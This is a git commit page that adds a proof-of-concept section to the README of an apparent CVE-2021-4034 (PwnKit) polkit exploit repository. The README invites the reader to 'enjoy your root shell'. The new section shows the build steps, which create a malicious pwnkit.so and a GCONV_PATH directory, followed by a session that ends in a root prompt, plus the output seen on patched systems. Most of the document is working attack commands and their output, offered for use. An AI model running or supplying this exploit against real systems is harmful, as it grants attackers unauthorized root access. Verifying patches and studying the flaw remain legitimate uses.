PoC in README
This commit is contained in:
parent
91059905ad
commit
87ebfb4d70
28
README.md
28
README.md
@ -4,3 +4,31 @@ One day for the polkit privilege escalation exploit
|
|||||||
Just execute `make`, `./cve-2021-4034` and enjoy your root shell.
|
Just execute `make`, `./cve-2021-4034` and enjoy your root shell.
|
||||||
|
|
||||||
The original advisory by the real authors is [here](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
|
The original advisory by the real authors is [here](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
|
||||||
|
|
||||||
|
## PoC
|
||||||
|
If the exploit is working you'll get a root shell immediately:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
|
||||||
|
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
|
||||||
|
cc -Wall cve-2021-4034.c -o cve-2021-4034
|
||||||
|
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
|
||||||
|
mkdir -p GCONV_PATH=.
|
||||||
|
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
|
||||||
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
|
||||||
|
# whoami
|
||||||
|
root
|
||||||
|
# exit
|
||||||
|
```
|
||||||
|
|
||||||
|
Updating polkit on most systems will patch the exploit, therefore you'll get the usage and the program will exit:
|
||||||
|
```bash
|
||||||
|
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
|
||||||
|
pkexec --version |
|
||||||
|
--help |
|
||||||
|
--disable-internal-agent |
|
||||||
|
[--user username] PROGRAM [ARGUMENTS...]
|
||||||
|
|
||||||
|
See the pkexec manual page for more details.
|
||||||
|
vagrant@ubuntu-impish:~/CVE-2021-4034$
|
||||||
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user